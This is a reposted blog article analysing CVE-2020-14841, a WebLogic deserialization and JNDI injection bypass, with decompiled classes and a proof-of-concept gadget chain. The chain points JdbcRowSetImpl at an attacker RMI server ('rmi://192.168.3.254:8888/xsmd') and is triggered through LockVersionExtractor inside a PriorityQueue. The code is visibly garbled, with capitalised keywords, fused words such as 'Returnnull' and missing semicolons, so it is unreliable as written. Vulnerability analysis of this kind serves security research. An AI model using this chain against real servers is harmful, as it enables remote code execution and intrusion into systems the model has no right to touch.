Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to conduct CVE 2020-14841 WebLogic JNDI injection bypass analysis, the content of the article is of high quality, so the editor shares it for you to do a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Brief introduction

Through the blacklist of weblogic in the diff upgrade package, we found that this class has been added:

Oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractorLockVersionExtractor Analysis of package oracle.eclipselink.coherence.integrated.internal.cache

Import com.tangosol.io.ExternalizableLite

Import com.tangosol.io.pof.PofReader

Import com.tangosol.io.pof.PofWriter

Import com.tangosol.io.pof.PortableObject

Import com.tangosol.util.ExternalizableHelper

Import com.tangosol.util.ValueExtractor

Import java.io.DataInput

Import java.io.DataOutput

Import java.io.IOException

Import oracle.eclipselink.coherence.integrated.cache.Wrapper

Import oracle.eclipselink.coherence.integrated.internal.querying.EclipseLinkExtractor

Import org.eclipse.persistence.mappings.AttributeAccessor

Public class LockVersionExtractor implements ValueExtractor, ExternalizableLite, PortableObject, EclipseLinkExtractor {

Protected AttributeAccessor accessor

Protected String className

Public LockVersionExtractor () {

}

Public LockVersionExtractor (AttributeAccessor accessor, String className) {

This.accessor = accessor

This.className = className

}

Public Object extract (Object arg0) {

If (arg0 = = null) {

Returnnull

} else {

If (arg0 instanceof Wrapper) {

Arg0 = (Wrapper) arg0) .unwrap ()

}

If (! this.accessor.isInitialized ()) {

This.accessor.initializeAttributes (arg0.getClass ())

}

Returnthis.accessor.getAttributeValueFromObject (arg0)

}

}

We can see from the code that similar to cve-2020-2555, the usage is the same. The focus of the trigger vulnerability is in this.accessor.getAttributeValueFromObject. Let's choose a possible execution path

Package org.eclipse.persistence.internal.descriptors

Public class MethodAttributeAccessor extends AttributeAccessor {

Protected String setMethodName = ""

Protected String getMethodName

Protected transient Method setMethod

Protected transient Method getMethod

Public Object getAttributeValueFromObject (Object anObject) throws DescriptorException {

Returnthis.getAttributeValueFromObject (anObject, (Object []) null)

}

Protected Object getAttributeValueFromObject (Object anObject, Object [] parameters) throws DescriptorException {

Try {

If (PrivilegedAccessHelper.shouldUsePrivilegedAccess ()) {

Try {

ReturnAccessController.doPrivileged (new PrivilegedMethodInvoker (this.getGetMethod (), anObject, parameters))

} catch (PrivilegedActionException var5) {

Exception throwableException = var5.getException ()

If (throwableException instanceof IllegalAccessException) {

Throw DescriptorException.illegalAccessWhileGettingValueThruMethodAccessor (this.getGetMethodName (), anObject.getClass (). GetName (), throwableException)

} else {

Throw DescriptorException.targetInvocationWhileGettingValueThruMethodAccessor (this.getGetMethodName (), anObject.getClass (). GetName (), throwableException)

}

}

} else {

Returnthis.getMethod.invoke (anObject, parameters)

}

The disadvantage of the getAttributeValueFromObject function in MethodAttributeAccessor is that it can only execute functions with no arguments. From this point of view, we can easily associate it with cve-2020-14645 in July.

So poc according to the cat is as follows

POC// JdbcRowSetImpl

JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl ()

JdbcRowSet.setDataSourceName ("rmi://192.168.3.254:8888/xsmd")

MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor ()

MethodAttributeAccessor.setGetMethodName ("getDatabaseMetaData")

MethodAttributeAccessor.setIsWriteOnly (true)

MethodAttributeAccessor.setAttributeName ("UnicodeSec")

LockVersionExtractor extractor = new LockVersionExtractor (methodAttributeAccessor, "UnicodeSec")

Final ExtractorComparator comparator = new ExtractorComparator (extractor)

Final PriorityQueue queue = new PriorityQueue (2, comparator)

Object [] Q = new Object [] {jdbcRowSet, jdbcRowSet}

Reflections.setFieldValue (queue, "queue", Q)

Reflections.setFieldValue (queue, "size", 2)

Field comparatorF = queue.getClass () .getDeclaredField ("comparator")

ComparatorF.setAccessible (true)

ComparatorF.set (queue, new ExtractorComparator (extractor))

This is the end of the analysis on how to bypass CVE 2020-14841 WebLogic JNDI injection. I hope the above content can be of some help and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.